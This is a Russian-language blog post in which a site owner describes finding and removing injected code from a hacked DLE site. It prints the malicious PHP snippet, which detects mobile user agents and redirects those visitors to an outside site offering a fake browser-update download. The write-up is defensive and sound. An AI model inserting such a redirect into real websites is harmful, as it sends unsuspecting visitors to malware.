DLE: как найти вредоносный код на сайте после взлома?

Здравствуйте дорогие друзья! За последние несколько дней, со мной случилось много интересного, точнее не со мной, а с моими сайтами. Интересного, да не очень приятного, но зато опыта набрался немного, вот решил им поделиться. Значит кто-то подсунул на один из моих сайтов вредоносный код, который перенаправлял посетителей с мобильных устройств на загрузку архива с обновлением браузера. Через несколько дней, еще были попытки взломать мой посещаемый сайт, но об этом в другой статье. Сейчас я расскажу, как у меня взломали сайт на DLE и подсунули на него вредоносный код.

Дело было так: купил я сайт на DLE с этим движком практически не работал, но как то удалось перенести без проблем, продавец попался хороший, помог. Сразу после переноса сайта на мой хостинг, проблем не было, все отлично работало, я доволен. Где-то через неделю после покупки, я случайно решил зайти на сайт с телефона (у меня Андроид). При переходе на сайт, сразу же появилось окно с предложением сохранить установочный файл .cab. Что то типа обновление браузера, короче насколько я понял, платный архив.

Я сразу понял, что сайт взломан и быстренько решил погуглить, так как в DLE я полный ноль, даже не знал с каких файлов начать искать вредоносный код. Но перед этим я сразу же сменил пароли на сайте, к БД, на хостинге и на FTP.

Проверил сразу файл .htaccess но там было все чисто. Нашел информацию, что нужно сначала искать код в файлах engine.php, config.php и т. д. Проверил эти два файла, в обоих обнаружил вот такой код:

$iphone = strpos($_SERVER[‘HTTP_USER_AGENT’],»iPhone»);
$android = strpos($_SERVER[‘HTTP_USER_AGENT’],»Android»);
$palmpre = strpos($_SERVER[‘HTTP_USER_AGENT’],»webOS»);
$berry = strpos($_SERVER[‘HTTP_USER_AGENT’],»BlackBerry»);
$ipod = strpos($_SERVER[‘HTTP_USER_AGENT’],»iPod»);

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header(‘Location: http://statuses.ws/’);

Как видите, этот вредоносный код, определяет посетитель с перечисленных в коде устройств и перенаправляет их на вредоносный сайт.

Значит нашел я такой код в файлах engine.php, config.php, dbconfig.php, index.php и init.php. После удаления кода с этих файлов, сайт с телефона открылся нормально. Продолжив проверку, я еще нашел этот код в файлах engine.php в корне сайта и в файле download.php в папке engine. Нужно бы еще сделать поиск по всем файлам сайта, пока не делал, но сделаю.

Так же написал в поддержку хостинга, с просьбой провести проверку сайта на вирусы. Они ответили, что просканировали сайт, но ничего подозрительного не нашли. Забыл еще написать, за несколько дней до этого, Яндекс прислал мне письмо, что при проверке этого сайта был найден вредоносный код, но после повторной проверки его уже не было обнаружено, я подумал что это глк. А это значит, что такой код может находится на сайте и Яндекс вам об этом не сообщит, конечно же лучше найти его первым :).

Еще проверял сайт такими сервисами как http://2ip.ru/site-virus-scaner/, но они ничего не находили.

Остается только вопрос, откуда там взялся этот вредоносный код. Я конечно же сразу подумал на продавца, что сайт с этим кодом был передан мне. Но сразу после покупки, я делал копию сайта. Проверив файлы в которых я обнаружил код, я увидел, что сайт мне был передан чистым, то есть сразу после покупки, файлы engine.php и т. д. не содержали вредоносного кода. Значит был взлом, подозреваю, что были украдены пароли к FTP.

Но рядом с этим сайтом лежали и другие, намного лучшие сайты, которые вроде как не пострадали.

Ну я все таки думаю, что попытки подобрать пароль к админке WordPress к одному из моих хороших сайтов через несколько дней после этого случая, это все таки совпадение. Кстати о том как меня хотели взломать, подобрав пароль к админке  Wordpress, я напишу в следующей статье. Удачи и берегите свои сайты.